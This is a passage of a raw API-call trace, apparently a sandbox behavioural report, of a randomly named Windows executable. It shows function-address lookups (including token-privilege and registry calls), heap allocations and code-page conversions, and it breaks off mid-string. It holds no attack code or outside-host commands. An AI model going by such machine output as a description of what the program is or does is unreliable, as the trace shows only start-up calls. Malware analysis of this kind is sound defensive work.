(hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0208.648] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0208.648] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0208.648] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0208.648] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0208.648] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0208.649] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0208.649] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0208.649] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0208.649] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0208.649] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0208.650] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0208.650] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0208.650] GetProcAddress (hModule=0x76d30000, lpProcName="ExitThread") returned 0x77c9d598 [0208.650] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0208.650] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0208.650] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0208.651] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0208.651] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0208.651] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0208.651] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0208.651] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0208.651] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0208.652] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0208.652] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0208.652] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0208.652] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0208.652] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0208.652] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0208.652] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0208.653] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0208.653] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0208.653] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0208.653] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0208.653] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0208.653] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0208.653] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0208.654] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0208.654] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0208.654] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0208.654] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0208.654] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0208.654] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0208.654] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0208.654] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0208.654] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0208.655] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0208.655] GetProcAddress (hModule=0x77710000, lpProcName="RegDeleteKeyW") returned 0x77721272 [0208.655] GetProcAddress (hModule=0x77710000, lpProcName="LookupPrivilegeValueW") returned 0x777241b3 [0208.655] GetProcAddress (hModule=0x77710000, lpProcName="AdjustTokenPrivileges") returned 0x7772418e [0208.655] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0208.655] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0208.655] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0208.655] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0208.656] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyW") returned 0x77722459 [0208.656] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyW") returned 0x77721514 [0208.656] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0208.656] GetProcAddress (hModule=0x77710000, lpProcName="LookupAccountSidW") returned 0x77724874 [0208.656] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x77270000 [0208.656] GetProcAddress (hModule=0x77270000, lpProcName="PrintDlgW") returned 0x772733a3 [0208.656] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0208.656] GetProcAddress (hModule=0x770a0000, lpProcName="StartPage") returned 0x770e401a [0208.656] GetProcAddress (hModule=0x770a0000, lpProcName="EndDoc") returned 0x770e3f29 [0208.657] GetProcAddress (hModule=0x770a0000, lpProcName="StartDocW") returned 0x770e4c51 [0208.657] GetProcAddress (hModule=0x770a0000, lpProcName="SetMapMode") returned 0x770bb02f [0208.657] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0208.657] GetProcAddress (hModule=0x770a0000, lpProcName="EndPage") returned 0x770c6bde [0208.657] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0208.657] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0208.657] GetProcAddress (hModule=0x77130000, lpProcName="DialogBoxIndirectParamW") returned 0x7716cbf3 [0208.657] GetProcAddress (hModule=0x77130000, lpProcName="EndDialog") returned 0x7716b99c [0208.657] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0208.658] GetProcAddress (hModule=0x77130000, lpProcName="InflateRect") returned 0x77153309 [0208.658] GetProcAddress (hModule=0x77130000, lpProcName="GetSysColorBrush") returned 0x771535a4 [0208.658] GetProcAddress (hModule=0x77130000, lpProcName="SetCursor") returned 0x771541f6 [0208.658] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowTextW") returned 0x771520ec [0208.658] GetProcAddress (hModule=0x77130000, lpProcName="GetDlgItem") returned 0x7716f1ba [0208.658] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x75440000 [0208.658] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoW") returned 0x754419f4 [0208.658] GetProcAddress (hModule=0x75440000, lpProcName="VerQueryValueW") returned 0x75441b51 [0208.659] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoSizeW") returned 0x754419d9 [0208.659] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x2) returned 1 [0209.284] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x4) returned 1 [0209.292] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x3578c780, dwHighDateTime=0x1d68287)) [0209.292] GetCurrentThreadId () returned 0x344 [0209.292] GetCurrentProcessId () returned 0xa28 [0209.292] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=32963149561) returned 1 [0209.298] GetProcessHeap () returned 0x620000 [0210.217] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0210.218] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0210.218] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0210.218] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0210.219] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0210.219] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0210.219] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0210.219] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0210.219] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0210.219] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0210.219] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0210.219] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0210.219] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0210.219] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0210.220] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0210.220] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0210.220] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0210.220] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0210.220] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0210.220] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0210.220] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0210.220] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0210.220] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0210.221] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0210.221] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0210.221] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0210.221] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0210.221] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0210.221] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0210.221] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0210.221] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0210.221] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0210.221] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0210.221] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0210.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x3bc) returned 0x6360c8 [0210.236] GetCurrentThreadId () returned 0x344 [0210.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x636490 [0210.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x800) returned 0x6364b0 [0210.237] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula -c 150 -y -p 2880 -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0x986ff229, hStdError=0x0)) [0210.237] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0210.237] GetFileType (hFile=0x3) returned 0x2 [0210.637] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0210.637] GetFileType (hFile=0x7) returned 0x2 [0210.638] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0210.638] GetFileType (hFile=0xb) returned 0x2 [0210.639] GetCommandLineW () returned="tdq963ii.exe -accepteula -c 150 -y -p 2880 -nobanner" [0210.639] GetEnvironmentStringsW () returned 0x636cb8* [0210.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb86) returned 0x637848 [0210.643] FreeEnvironmentStringsW (penv=0x636cb8) returned 1 [0210.644] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0210.644] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x636cb8 [0210.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xa0) returned 0x636d50 [0210.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x3e) returned 0x6383f0 [0210.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x6c) returned 0x636df8 [0210.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x6e) returned 0x636e70 [0210.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x78) returned 0x62f8e8 [0210.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x62) returned 0x636ee8 [0210.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x2e) returned 0x636f58 [0210.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x48) returned 0x636f90 [0210.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x2a) returned 0x636fe0 [0210.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x28) returned 0x637018 [0210.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x1a) returned 0x635a98 [0210.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x4a) returned 0x637048 [0210.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x72) returned 0x62f968 [0210.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x30) returned 0x6370a0 [0210.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x2e) returned 0x6370d8 [0210.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x1c) returned 0x635ac0 [0210.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xd2) returned 0x637110 [0210.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x7c) returned 0x6371f0 [0210.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x36) returned 0x637278 [0210.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x3a) returned 0x638438 [0210.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x90) returned 0x6372b8 [0210.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x24) returned 0x637350 [0210.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x30) returned 0x637380 [0210.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x36) returned 0x6373b8 [0210.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x48) returned 0x6373f8 [0210.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x52) returned 0x637448 [0210.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x3c) returned 0x638480 [0210.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x18) returned 0x6374a8 [0210.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x82) returned 0x6374c8 [0210.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x2e) returned 0x637558 [0210.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x1e) returned 0x635ae8 [0210.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x2c) returned 0x637590 [0210.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x54) returned 0x6375c8 [0210.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x52) returned 0x637628 [0210.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x2a) returned 0x637688 [0210.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x3c) returned 0x6384c8 [0210.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x54) returned 0x6376c0 [0210.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x24) returned 0x637720 [0210.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x30) returned 0x637750 [0210.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x8c) returned 0x637788 [0210.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x637848 | out: hHeap=0x620000) returned 1 [0212.328] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x800) returned 0x637820 [0212.328] GetLastError () returned 0x0 [0212.328] SetLastError (dwErrCode=0x0) [0212.328] GetLastError () returned 0x0 [0212.328] SetLastError (dwErrCode=0x0) [0212.328] GetLastError () returned 0x0 [0212.328] SetLastError (dwErrCode=0x0) [0212.328] GetACP () returned 0x4e4 [0212.328] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x220) returned 0x638028 [0212.329] GetLastError () returned 0x0 [0212.329] SetLastError (dwErrCode=0x0) [0212.329] IsValidCodePage (CodePage=0x4e4) returned 1 [0212.329] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1 [0212.329] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1 [0212.332] GetLastError () returned 0x0 [0212.332] SetLastError (dwErrCode=0x0) [0212.332] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0212.335] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0212.335] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0212.335] GetLastError () returned 0x0 [0212.335] SetLastError (dwErrCode=0x0) [0212.335] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0212.335] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0212.335] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0212.335] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0212.335] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ¹óo\x98äþ\x18", lpUsedDefaultChar=0x0) returned 256 [0212.336] GetLastError () returned 0x0 [0212.336] SetLastError (dwErrCode=0x0) [0212.336] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0212.336] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 